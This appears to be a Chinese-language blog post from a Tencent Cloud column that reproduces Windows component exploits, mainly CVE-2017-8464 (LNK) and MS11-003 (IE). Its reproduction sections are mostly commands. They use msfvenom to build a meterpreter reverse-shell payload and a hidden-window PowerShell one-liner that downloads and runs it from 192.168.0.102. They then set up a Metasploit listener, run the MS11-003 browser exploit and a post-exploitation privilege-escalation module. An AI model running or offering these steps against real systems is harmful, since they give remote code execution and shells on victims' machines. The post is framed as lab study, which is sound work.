前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Windows系统组件漏洞

Windows系统组件漏洞

作者头像
宸寰客
发布2020-09-22 17:11:32
9960
发布2020-09-22 17:11:32
举报
文章被收录于专栏:yuancao博客yuancao博客

目录

什么是组件

组件一般都是系统自带都有的, 如:WINXPWIN2000它本身,就带有非常强大的组件功能。添加组件可以使系统的功能更加强大。 具体方式:

代码语言:javascript
复制
控制面板--添加或删除程序--添加/删除组件

1.CVE-2017-8464

原理

Windows系统使用二进制解析 .LNK文件,当恶意二进制代码被系统识别执行时即可实现远程代码执行,由于是在explorer.exe进程中运行,所以 load 进内存时与当前用户具有相同权限

在这里插入图片描述
在这里插入图片描述

复现

环境部署
代码语言:javascript
复制
msfvenom  -p   windows/x64/meterpreter/reverse_tcp  lhost=192.168.0.102   lport=5555  -f  psh-reflection>/opt/search.ps1   #生成shell反弹木马

mv  search.ps1  /var/www/html   #木马移动到/var/www/html

service apache2 start #启动服务

powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.102/search.ps1');test.ps1"    #创建快捷件远程加载
远程监听
代码语言:javascript
复制
use exploit/multi/handler  

set payload windows/x64/meterpreter/reverse_tcp  

show options  

set LHOST 192.168.0.102  

set lport  5555    

exploit 

2.MS11_003 溢出漏洞

原理

溢出漏洞是由于程序中的某个或某些输入函数(使用者输入参数)对所接收数据的边界验证不严密而造成。 根据程序执行中堆栈调用原理,程序对超出边界的部分如果没有经过验证自动去掉,那么超出边界的部分就会覆盖后面的存放程序指针的数据,当执行完上面的代码,程序会自动调用指针所指向地址的命令。

复现

代码语言:javascript
复制
search ms11_003
use exploit/windows/browser/ms11_003_ie_css_import
set payload windows/meterpreter/reverse_tcp
set srvhost
set lhost 192.168.0.102
set uripath 00
Run
sessions
下一步提权
代码语言:javascript
复制
use  post/multi/recon/local_exploit_suggester
set LHOST 192.168.0.102
set SESSION 1
Exploit

3.CVE-2019-0708

可参考: https://blog.csdn.net/yumengzth/article/details/102768945?utm_medium=distribute.pc_relevant.none-task-blog-title-7&spm=1001.2101.3001.4242

4.CVE-2020-0796(永恒之黑)

https://blog.csdn.net/PigLL/article/details/108012981

5.…………………………

本文参与 腾讯云自媒体分享计划,分享自作者个人站点/博客。
原始发表:2020-09-19 ,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 目录
  • 什么是组件
  • 1.CVE-2017-8464
    • 原理
      • 复现
        • 环境部署
        • 远程监听
    • 2.MS11_003 溢出漏洞
      • 原理
        • 复现
          • 下一步提权
      • 3.CVE-2019-0708
      • 4.CVE-2020-0796(永恒之黑)
      • 5.…………………………
      领券
      问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档